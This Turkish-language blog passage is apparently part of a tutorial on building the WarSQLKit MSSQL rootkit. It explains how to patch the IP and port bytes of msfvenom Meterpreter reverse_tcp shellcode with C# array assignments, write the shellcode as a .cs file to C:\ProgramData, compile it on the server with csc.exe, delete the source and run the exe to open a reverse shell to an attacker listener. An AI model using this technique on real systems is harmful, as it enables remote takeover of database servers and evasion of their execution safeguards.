        Int32 t\u00fcr\u00fcne set etti\u011fimiz port de\u011ferini kontrol etmek i\u00e7in bir if ko\u015fulu tan\u0131mlad\u0131m. Buna g\u00f6re girilen port numaras\u0131 256\u2019dan b\u00fcy\u00fckse ko\u015fulumuz \u00e7al\u0131\u015facak ve bir hesaplama yapmak zorunda kalaca\u011f\u0131z. Port e\u011fer 256\u2019dan b\u00fcy\u00fckse, ilk olarak girilen portu 256\u2019ya b\u00f6lerek, \u00e7\u0131kan tam rakam\u0131 int t\u00fcrden bir de\u011fi\u015fkene at\u0131yoruz. Daha sonra \u00e7arpan toplam\u0131n\u0131 hesaplamak i\u00e7in int t\u00fcrden ikinci bir de\u011fi\u015fken tan\u0131ml\u0131yoruz ve bir \u00f6nceki de\u011ferden elde edilen int de\u011fi\u015fken ile 256\u2019y\u0131 \u00e7arp\u0131yoruz.<\/p>\n\n\n\n
        \u00c7arpan hesapland\u0131ktan sonra set edilen porttan, elde etti\u011fimiz ikinci de\u011fi\u015fkenin de\u011ferini \u00e7\u0131kararak \u00fc\u00e7\u00fcnc\u00fc bir int de\u011fi\u015fkene at\u0131yoruz. Ard\u0131ndan bir if ko\u015fulu daha tan\u0131mlayarak, girilen port de\u011feri ile hesaplamadan \u00e7\u0131kan port de\u011ferini kar\u015f\u0131la\u015ft\u0131r\u0131yoruz. E\u011fer ko\u015ful do\u011fru olarak sa\u011flan\u0131yorsa \u00e7\u0131kan de\u011ferleri, daha \u00f6nce tan\u0131mlad\u0131\u011f\u0131m\u0131z byte t\u00fcr\u00fcndeki port de\u011fi\u015fkenlerine at\u0131yoruz.<\/p>\n\n\n\n
        Bu k\u0131s\u0131m biraz kar\u0131\u015f\u0131k gelebilir. Daha anla\u015f\u0131l\u0131r olmas\u0131 i\u00e7in \u00f6rnekleme yapaca\u011f\u0131m. \u00d6rne\u011fin biz meterpreter\u2019\u0131n 4444 portundan bize d\u00f6nmesini istiyoruz. Shellcode\u2019umuzda bu port i\u00e7in ayr\u0131lm\u0131\u015f 2 byte\u2019l\u0131k alan var, bu alan\u0131 set etmemiz gerekiyor. 4444\/256=17 rakam\u0131n\u0131 buluyoruz. 17*256=4352. 4444-4352=92 de\u011ferlerini buluyoruz. Buna g\u00f6re 4444 portu i\u00e7in 17 ve 92 say\u0131lar\u0131n\u0131 shellcode\u2019umuza tan\u0131mlamam\u0131z laz\u0131m. 17\u2019nin byte (hex) t\u00fcrden kar\u015f\u0131l\u0131\u011f\u0131 0x11 ve 92\u2019nin byte t\u00fcrden kar\u015f\u0131l\u0131\u011f\u0131 ise 0x5c olacakt\u0131r. 57156 portu i\u00e7in \u00f6rneklersek de 57156\/256=223, 223*256=57088, 57156-57088=68, kar\u015f\u0131l\u0131\u011f\u0131 ise 0xdf ve 0x044 olacakt\u0131r. Shellcode\u2019umuzda port de\u011ferine kar\u015f\u0131l\u0131k gelen byte de\u011fi\u015fkenlerine bunlar\u0131 atamam\u0131z gerekiyor.<\/p>\n\n\n\n
        \u00d6rnek olarak verdi\u011fimiz 192.168.139.129 IP adresimiz shellcode\u2019umuzda 0xc0, 0xa8, 0x8b, 0x81\u2019e denk gelecektir. \u015eimdi bu de\u011fi\u015fkenleri shellcode\u2019umuzda de\u011fi\u015ftirmemiz gerekiyor. Belirtti\u011fim parametreler ile msfvenom\u2019dan \u00fcretece\u011fimiz shellcode hep ayn\u0131 de\u011fi\u015fken s\u0131ras\u0131 ile \u00fcretilecektir. Byte array\u2019de yer alan IP ve port bilgisi a\u015fa\u011f\u0131daki gibi olacakt\u0131r.<\/p>\n\n\n\n
        \"\"
        13_shellcode_csharp<\/figcaption><\/figure>\n\n\n\n
        Byte array\u2019in 174, 175, 176 ve 177 numaralar\u0131nda bizim set etti\u011fimiz IP adresinin tutuldu\u011funu g\u00f6rebiliriz. Port hesaplamaya yukarda de\u011finmi\u015ftim. 4444 portunun 17 ve 92\u2019ye kar\u015f\u0131l\u0131k geldi\u011fini g\u00f6rm\u00fc\u015ft\u00fck. Portumuz da 181 ve 182 byte\u2019larda yer almaktad\u0131r. Parametre olarak g\u00f6nderilen IP ve port i\u00e7in byte array\u2019de yer alan alanlar\u0131 de\u011fi\u015ftirmemiz yeterli olacakt\u0131r.<\/p>\n\n\n\n
        buf[174] = octByte1;\nbuf[175] = octByte2;\nbuf[176] = octByte3;\nbuf[177] = octByte4;\nbuf[181] = port1Byte;\nbuf[182] = port2Byte;<\/code><\/pre>\n\n\n\n
        Shellcode i\u00e7erisinde yer alan IP ve port de\u011ferlerini yukar\u0131daki gibi set ediyoruz. Buraya kadar her \u015fey tamamd\u0131r. \u015eimdi StoredProcedure.cs\u2019e geri d\u00f6nerek, Meterpreter shellcode\u2019umuzu \u00e7a\u011f\u0131racak tan\u0131mlamay\u0131 yapmal\u0131y\u0131z. Yani MSSQL\u2019den \u201cEXEC sp_cmdExec \u2018sp_meterpreter_reverse_tcp 192.168.139.129 4444\u2019\u201d \u015feklinde bir komut \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131m\u0131zda, SaveReverseMeterpreter(string ip, string port) metodumuzu \u00e7a\u011f\u0131rs\u0131n.<\/p>\n\n\n\n
        \"\"
        14_save_reverse_meterpreter<\/figcaption><\/figure>\n\n\n\n
        CmdExec i\u00e7erisine bir if ko\u015fulu tan\u0131mlayarak, g\u00f6nderilen komut i\u00e7erisinde \u201csp_meterpreter_reverse_tcp<\/strong>\u201d varsa, komutun bo\u015fluklara g\u00f6re split edilmesi gerekti\u011fini s\u00f6yledik. Daha sonra MeterpreterBuilder s\u0131n\u0131f\u0131n\u0131 \u00e7a\u011f\u0131rarak Ip ve Port de\u011ferlerini set ederek, SaveReverseMeterpreter() metodunu \u00e7a\u011f\u0131rd\u0131k. Art\u0131k kodlar\u0131m\u0131z haz\u0131r. Bu kodlar\u0131 MSSQL sunucusunda .NET Framework kullanarak, Visual Studio olmadan derleyece\u011fiz ve Meterpreter exe\u2019sini build edece\u011fiz. B\u00f6ylece \u201csqlservr.exe\u201dnin shellcode\u2019u \u00e7al\u0131\u015ft\u0131rma engelini atlaca\u011f\u0131z.<\/p>\n\n\n\n
        Not: IsRunSystemPriv parametresini daha sonra a\u00e7\u0131klayaca\u011f\u0131m.<\/p>\n\n\n\n
        8. .NET Framework\u2019den Faydalanarak (Visual Studio Olmadan) MSSQL \u00dczerinden C# Kodu Derleme<\/h3>\n\n\n\n
        Bu b\u00f6l\u00fcmde olu\u015fturdu\u011fumuz Meterpreter shellcode\u2019unu bir csharp (.cs) dosyas\u0131 haline getirerek, SQL sunucusunda \u00e7al\u0131\u015ft\u0131racak kodlar\u0131m\u0131za de\u011finece\u011fim. 7. B\u00f6l\u00fcmde olu\u015fturdu\u011fumuz shellcode\u2019u bir console uygulamas\u0131 \u015feklinde yeniden d\u00fczenlememiz gerekiyor.<\/p>\n\n\n\n
        \"\"
        15_shellcode_save_cs<\/figcaption><\/figure>\n\n\n\n
        Shellcode\u2019umuzu bir console uygulamas\u0131 \u015feklinde var(string) t\u00fcr\u00fcnden bir de\u011fi\u015fkene doldurdum. De\u011fi\u015fkene doldurdu\u011fum bu string veriyi SQL Server\u2019daki yazma iznimizin oldu\u011fu bir dizine yazd\u0131rmam\u0131z laz\u0131m. Bu i\u015flem i\u00e7in a\u015fa\u011f\u0131daki kodu kullanabiliriz.<\/p>\n\n\n\n
        File.WriteAllText(@\"C:\\\\ProgramData\\\\meterpreter_reverse_tcp.cs\", strMtr);<\/code><\/pre>\n\n\n\n
        Metodumuzu SQL Serverdan \u00e7a\u011f\u0131rd\u0131\u011f\u0131m\u0131zda C:\\ProgramData dizinine meterpreter_reverse_tcp.cs ismi ile shellcode\u2019umuzu kaydedecektir. SQL Server\u2019a kaydedilen dosyam\u0131z a\u015fa\u011f\u0131daki gibi g\u00f6r\u00fcnecektir.<\/p>\n\n\n\n
        \"\"
        16_shellcode_save_cs<\/figcaption><\/figure>\n\n\n\n
        SQL Server\u2019a kaydettirdi\u011fimiz csharp (.cs) dosyam\u0131z\u0131 Visual Studio olmadan derlemeye ihtiyac\u0131m\u0131z var. Bunun i\u00e7in sunucuda .net framework\u2019\u00fcn y\u00fckl\u00fc olmas\u0131 yeterlidir. Zaten MSSQL \u00fczerinde \u00e7al\u0131\u015ft\u0131\u011f\u0131m\u0131z i\u00e7in, MSSQL\u2019in .Net Framework ba\u011f\u0131ml\u0131l\u0131\u011f\u0131 var. Yani her ko\u015fulda sunucuda .Net Framework var diyebiliriz. \u0130yi g\u00fczel, .Net Framework var lakin hangi s\u00fcr\u00fcm\u00fc var sunucuda? Bunu bilmiyoruz. S\u00fcr\u00fcm\u00fc veya s\u00fcr\u00fcmleri \u00f6\u011frenmek i\u00e7in a\u015fa\u011f\u0131daki gibi bir metot daha yaz\u0131yoruz.<\/p>\n\n\n\n
        \"\"
        17_net_framework_version<\/figcaption><\/figure>\n\n\n\n
        List<string> t\u00fcr\u00fcnden bir Generic List olu\u015fturarak, \u201cC:\\Windows\\Microsoft.NET\\Framework\u201d klas\u00f6r\u00fcnde bulunan alt dizinlerin isimlerini generic list i\u00e7erisine dolduruyoruz. Sunucuda y\u00fckl\u00fc olan t\u00fcm .Net Framework\u2019ler bu dizinde yer almaktad\u0131r. Bu bilgiyi de elde ettikten sonra, art\u0131k gidip csharp(.cs) dosyam\u0131z\u0131 build edebiliriz.<\/p>\n\n\n\n
        .Net Framework\u2019\u00fcn kurulu oldu\u011fu dizinde \u201ccsc.exe\u201d dosyas\u0131 bulunmaktad\u0131r. csc.exe .net framework ile birlikte gelen bir csharp derleyicisidir. Bu exe\u2019yi kullanarak Visual Studio\u2019ya ihtiya\u00e7 duymadan, herhangi bir .cs dosyas\u0131n\u0131 derleyebiliriz. Rootkit\u2019te kulland\u0131\u011f\u0131m \u00f6rnek derleme i\u015flemi a\u015fa\u011f\u0131daki gibidir.<\/p>\n\n\n\n
        \"\"
        18_build_meterpreter<\/figcaption><\/figure>\n\n\n\n
        Cmd.exe\u2019nin \/c parametresine g\u00fcncel .Net Framework versiyonun y\u00fckl\u00fc oldu\u011fu dizinde bulunan csc.exe\u2019yi \u00e7al\u0131\u015ft\u0131rarak \u201c\/unsafe \/platform:x86\u201d x86 mimaride bir derleme yapmas\u0131n\u0131, derlenen exe\u2019yi \u201c\/out:C:\\ProgramData\\\u201d dizinine random bir isimle kaydetmesini ve kaynak kod olarak da \u201cC:\\ProgramData\\\u201d dizinine random bir isimle kaydetti\u011fim meterpreter_reverse_tcp.cs dosyas\u0131n\u0131 derlemesini s\u00f6yledim.<\/p>\n\n\n\n
        Ard\u0131ndan \u201cFile.Delete(@\u201dC:\\ProgramData\\\u201d + randomFileName + @\u201d_reverse.cs\u201d);\u201d ile olu\u015fturmu\u015f oldu\u011fum .cs dosyas\u0131n\u0131 sunucudan silmesini istedim. Ve son olarak da \u201cBuildRunMeterpreter(@\u201dC:\\Windows\\System32\\cmd.exe\u201d, @\u201d \/c C:\\ProgramData\\\u201d + randomFileName + @\u201d_reverse.exe\u201d);\u201d kodu ile de cmd.exe \/c parametresi ile olu\u015fturdu\u011fum Meterpreter exe\u2019sini \u00e7al\u0131\u015ft\u0131rmas\u0131n\u0131 istedim.<\/p>\n\n\n\n
        Not: Bu i\u015flemlerden \u00f6nce msfconsole\u2019dan exploit\/multi\/handler kullanarak windows\/meterpreter\/reverse_tcp payload\u2019\u0131n\u0131 set etmi\u015f ve ba\u011flant\u0131lar\u0131 bekliyor olmam\u0131z gerekiyor. WarSQLKit i\u00e7erisinde bu y\u00f6ntem ile tan\u0131mlanm\u0131\u015f olan 4 adet Meterpreter ajan\u0131 mevcuttur. A\u015fa\u011f\u0131daki Meterpreter payload\u2019lar\u0131n\u0131 WarSQLKit i\u00e7erisinde kullanabiliriz.<\/p>\n\n\n\n